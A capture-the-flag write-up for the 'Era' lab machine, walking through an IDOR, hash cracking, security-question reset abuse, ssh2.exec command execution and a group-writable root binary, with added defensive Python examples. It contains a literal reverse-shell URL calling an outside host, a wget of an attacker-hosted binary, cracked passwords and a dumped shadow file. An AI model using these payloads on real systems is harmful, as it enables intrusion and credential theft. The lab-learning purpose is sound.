Basic information

Port scan

Ports 21 and 80 are open:

```bash
$ nmap -sC -sV -Pn 10.10.11.79
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 16:11 JST
Nmap scan report for 10.10.11.79
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://era.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.99 seconds
```

80

The redirect target needs a hosts entry:

```
10.10.11.79 era.htb
```

It is a design-related website:

Subdomain scan

A routine subdomain scan finds `file`:

```bash
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://era.htb/" -H 'Host: FUZZ.era.htb' -fs 154

file [Status: 200, Size: 6765, Words: 2608, Lines: 234, Duration: 188ms]
```

file

After adding the hosts entry and visiting it, the site is Era Storage:

Era Storage

The page has a few features. There are two ways to log in, by security question and by password, and directory scanning also turns up a registration page:

```bash
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://file.era.htb/ -x php --exclude-length 6765

/assets (Status: 301) [Size: 178] [--> http://file.era.htb/assets/]
/download.php (Status: 302) [Size: 0] [--> login.php]
/files (Status: 301) [Size: 178] [--> http://file.era.htb/files/]
/images (Status: 301) [Size: 178] [--> http://file.era.htb/images/]
/layout.php (Status: 200) [Size: 0]
/login.php (Status: 200) [Size: 9214]
/logout.php (Status: 200) [Size: 70]
/manage.php (Status: 302) [Size: 0] [--> login.php]
/register.php (Status: 200) [Size: 3205]
/upload.php (Status: 302) [Size: 0] [--> login.php]
```

Register an arbitrary account and log in; the application is a file manager:

download

Testing upload and download shows that downloads are keyed by a plain numeric id, so we try enumerating it for an IDOR:

Enumeration finds two valid ids, 54 and 150.

site-backup-30-08-24.zip

Site backup:

It contains a database file from which several password hashes can be pulled:

```
sqlite3 filedb.sqlite

sqlite> .tables
sqlite> select * from users;
1|admin_ef01cab31aa|$2y$10$wDbohsUaezf74d3sMNRPi.o93wDxJqphM2m0VVUp41If6WrYr.QPC|600|Maria|Oliver|Ottawa
2|eric|$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm|-1|||
3|veronica|$2y$10$xQmS7JL8UT4B3jAYK7jsNeZ4I.YqaFFnZNA/2GCxLveQ805kuQGOK|-1|||
4|yuri|$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.|-1|||
5|john|$2a$10$iccCEz6.5.W2p7CSBOr3ReaOqyNmINMH1LaqeQaL22a1T1V/IddE6|-1|||
6|ethan|$2a$10$PkV/LAd07ftxVzBHhrpgcOwD3G1omX4Dk2Y56Tv9DpuUV/dh/a1wC|-1|||
```

Of these, yuri's and eric's hashes crack to the following passwords:

```
eric america
yuri mustang
```

signing.zip

These appear to be signing certificate files:

FTP

yuri can log in to FTP:

```
eric america
yuri mustang
```

It mostly holds configuration files, including the list of enabled PHP extensions; ssh2 is among them.

Code review

Back to the code: several vulnerabilities can be found in it:

reset

The security-question reset never checks that the current user is the account being reset, so we can reset admin's security question and then log in as admin:

download

The download code has a hidden "immediate file download" mode that lets admin fetch a file through a PHP stream wrapper. Since ssh2 was seen to be enabled earlier, and the ssh2 wrapper has an exec mode that runs system commands, this becomes command execution:
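The two authorization bugs described here (a reset that does not tie the target account to the logged-in session, and a download mode that hands a client-chosen format/wrapper to the file read), together with the numeric-id IDOR found during the download test, all have the same shape of fix: bind every decision to the session, check ownership, and allowlist the format. The following is an added example written for this write-up, not code from the Era Storage application; the in-memory users/files tables, the usernames, `ALLOWED_FORMATS` and `FILE_ROOT` are constructed assumptions (file ids 54 and 150 are taken from the page).

```python
from dataclasses import dataclass

# Constructed stand-ins for the users and files tables (not the real schema).
@dataclass
class User:
    id: int
    username: str
    is_admin: bool
    security_answer: str

@dataclass
class StoredFile:
    id: int
    owner_id: int
    name: str

USERS = {
    1: User(1, "admin", True, "old-answer"),
    2: User(2, "alice", False, "blue"),
}
FILES = {
    54: StoredFile(54, 1, "site-backup-30-08-24.zip"),
    150: StoredFile(150, 1, "signing.zip"),
    201: StoredFile(201, 2, "notes.txt"),
}

# Assumption: these are the only output formats the application needs.
ALLOWED_FORMATS = {"raw", "zip"}
FILE_ROOT = "/var/www/files"  # assumption: fixed storage directory


class Forbidden(Exception):
    """Raised for any request the caller is not allowed to make."""


def reset_security_answer(session_user_id, target_user_id, new_answer):
    """Security-question reset bound to the session.

    The write-up's flaw: the handler trusted the account named in the request.
    Here the target must be the authenticated user, so another account's
    question cannot be reset from an attacker's own session.
    """
    if session_user_id != target_user_id:
        raise Forbidden("can only reset your own security question")
    USERS[target_user_id].security_answer = new_answer
    return True


def resolve_download(session_user_id, file_id, fmt="raw"):
    """Return the server-side path to serve, or raise Forbidden."""
    user = USERS[session_user_id]
    f = FILES.get(file_id)
    # Ownership check closes the IDOR: non-admins may only fetch their own files.
    # Missing and foreign ids get the same error, so valid ids cannot be told
    # apart by watching for a different response.
    if f is None or (f.owner_id != user.id and not user.is_admin):
        raise Forbidden("no such file")
    # Allowlist the format. The client value is compared against fixed names and
    # is never interpolated into the path handed to fopen()/file_get_contents(),
    # so a stream wrapper such as ssh2.exec:// or php:// is never opened.
    if fmt not in ALLOWED_FORMATS:
        raise Forbidden("unsupported format")
    return f"{FILE_ROOT}/{f.name}"


def denies(fn, *args):
    """True if fn(*args) is refused with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("alice resetting admin's question:", denies(reset_security_answer, 2, 1, "x"))
    print("alice fetching admin's backup (id 54):", denies(resolve_download, 2, 54))
    print("wrapper in format:", denies(resolve_download, 2, 201, "ssh2.exec://host/cmd"))
    print("alice's own file:", resolve_download(2, 201))
```

The ownership check and the allowlist are independent: even with the IDOR fixed, an admin session that can pass an arbitrary `format` still reaches the wrapper, so both checks are needed.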

Download to shell

So the chain is: reset admin's security question to log in as admin, then use ssh2.exec through the download to execute commands:

reset

First reset the security question and log in:

ssh2.exec

Then build the download link so that ssh2.exec runs a command, which gives a shell as yuri:

```
http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash -c "bash -i >& /dev/tcp/10.10.14.7/4444 0>&1";

http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.7%2F4444%200%3E%261%22;
```
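From the defender's side, the request above leaves an unmistakable trace in the web server's access log: a `format` parameter whose value begins with a URL scheme, and, earlier, a burst of `download.php?id=` requests with many distinct ids from one client. The following is an added example, not part of the write-up or of the target: it parses constructed nginx combined-format log lines (the IPs, timestamps and user agents are made up, and the command in the wrapper line is replaced by `id`) and flags both patterns.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Enough of the nginx "combined" format to pull out the client IP, the request
# target (path plus query string) and the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# A value that starts with a URL scheme is a PHP stream wrapper
# (ssh2.exec://, php://, file://, ...); a "download format" never needs one.
WRAPPER_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample log (not real traffic): a normal download, one wrapper
# request modelled on the write-up with the command replaced by "id", and a
# 30-id enumeration burst from a third client.
SAMPLE_LINES = [
    '10.10.14.20 - - [02/Aug/2025:16:20:01 +0900] "GET /download.php?id=54 HTTP/1.1" 200 6765 "-" "Mozilla/5.0"',
    '10.10.14.7 - - [02/Aug/2025:16:21:13 +0900] "GET /download.php?id=54&show=true&format=ssh2.exec://user:pass@127.0.0.1/id HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
] + [
    f'10.10.14.9 - - [02/Aug/2025:16:22:{i:02d} +0900] "GET /download.php?id={i} HTTP/1.1" 404 0 "-" "python-requests/2.31"'
    for i in range(1, 31)
]


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, sweep_threshold=20):
    """Scan access-log lines for the two download.php abuse patterns.

    Returns a list of findings, each a dict with "rule", "ip" and "detail".
    """
    findings = []
    ids_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        if not path.endswith("/download.php"):
            continue
        # parse_qs percent-decodes values, so an encoded scheme is caught too.
        params = parse_qs(query, keep_blank_values=True)
        for fmt in params.get("format", []):
            if WRAPPER_RE.match(fmt):
                findings.append({"rule": "stream_wrapper_in_format",
                                 "ip": rec["ip"], "detail": fmt})
        for fid in params.get("id", []):
            ids_by_ip[rec["ip"]].add(fid)
    # Many distinct ids from one client is the IDOR enumeration signature.
    for ip, ids in sorted(ids_by_ip.items()):
        if len(ids) >= sweep_threshold:
            findings.append({"rule": "download_id_sweep", "ip": ip,
                             "detail": f"{len(ids)} distinct ids"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f"{f['rule']:26} {f['ip']:12} {f['detail']}")
```

The sweep threshold is deliberately a parameter: on a file-sharing site with many files per user a legitimate client may fetch dozens of ids, so tune it per application, and note that a low-and-slow enumeration spread across many source addresses will not trip the per-IP count.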

User flag

Switch to the eric user with the password recovered earlier:

Privilege escalation information

Routine enumeration reveals a monitor program that root runs; our current user's devs group has write permission on it:

So the plan is to replace the program; the signing certificate obtained earlier is what is used here as well.
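A binary that root executes on a schedule but that a non-root group can write is the whole privilege-escalation path here, and it is a pure permissions finding that can be audited mechanically. The following is an added example, not part of the write-up: `audit_root_run_binary()` reports every condition under which a non-root user could change what root runs (the group-writable file and the `rm` + `cp` replacement are the only details taken from the page; the fixture built by `demo()` is constructed in a temporary directory, and the file contents are made up).

```python
import os
import stat
import tempfile


def audit_root_run_binary(path):
    """List the ways a non-root user could alter what root executes at `path`."""
    problems = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        problems.append("path is a symlink; its target could be repointed")
        st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWGRP:
        problems.append(f"file is group-writable (mode {mode:04o}, gid {st.st_gid})")
    if mode & stat.S_IWOTH:
        problems.append(f"file is world-writable (mode {mode:04o})")
    if st.st_uid != 0:
        problems.append(f"file is owned by uid {st.st_uid}, not root")
    # Even a 0755 root-owned file can be deleted and replaced if its directory
    # is writable (this is what the rm + cp sequence in the write-up relies on).
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    pmode = stat.S_IMODE(pst.st_mode)
    if pmode & (stat.S_IWGRP | stat.S_IWOTH) and not pmode & stat.S_ISVTX:
        problems.append(f"directory {parent} is writable (mode {pmode:04o}); the file can be replaced")
    return problems


def demo():
    """Constructed fixture: a group-writable 'monitor' next to a hardened copy.

    Returns (problems_for_writable, problems_for_hardened).
    """
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)  # the directory itself is not group-writable
        writable = os.path.join(d, "monitor")
        hardened = os.path.join(d, "monitor-hardened")
        for p in (writable, hardened):
            with open(p, "wb") as fh:
                fh.write(b"#!/bin/sh\necho monitor\n")  # constructed stand-in for the binary
        os.chmod(writable, 0o775)  # rwxrwxr-x: the devs-group situation from the page
        os.chmod(hardened, 0o755)  # rwxr-xr-x: only the owner can write
        return audit_root_run_binary(writable), audit_root_run_binary(hardened)


if __name__ == "__main__":
    bad, good = demo()
    print("monitor:         ", bad or ["ok"])
    print("monitor-hardened:", good or ["ok"])
```

Run against a real host, point the function at each path that cron, systemd timers or a root-owned service execute; the "owned by uid N, not root" finding will also fire on the demo fixture when the script is run as an unprivileged user, which is the expected result for a file that root should own.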

Privilege escalation & root flag

It is easier to build and sign the ELF locally, then copy it over:

```bash
x86_64-linux-gnu-gcc -o monitor exp.c -static

# linux-elf-binary-signer
make clean
gcc -o elf-sign elf_sign.c -lssl -lcrypto

# sign
./elf-sign sha256 key.pem key.pem monitor

wget http://10.10.14.7:7777/monitor
chmod +x monitor
rm /opt/AV/periodic-checks/monitor
cp monitor /opt/AV/periodic-checks/monitor
```

Once the replacement is in place, wait for the scheduled run to execute it:

shadow

```
root:$y$j9T$KS466bqZgScjpShqW.M5R.$ZJiDypD1.tHrT5D3AeWhnsIUp2rIrTnkRp4jrV5TjgB:19983:0:99999:7:::
eric:$6$.ki8iFVEyU3nItnU$hbR6van4JaXfZTkvXIynNfMIZMp4YCeU9f/jRR4xfdtCOceIJxwDHKrKyjMZtb2juxWsE6GcHJQAxfat7m12a/:19983:0:99999:7:::
yuri:$y$j9T$nb4GkUIQQFAvxZEOhZ0Dk0$WvwIZQLgnstRTdMheX1tug.aHi0TrwGcFJB93k8DcA6:20268:0:99999:7:::
```

References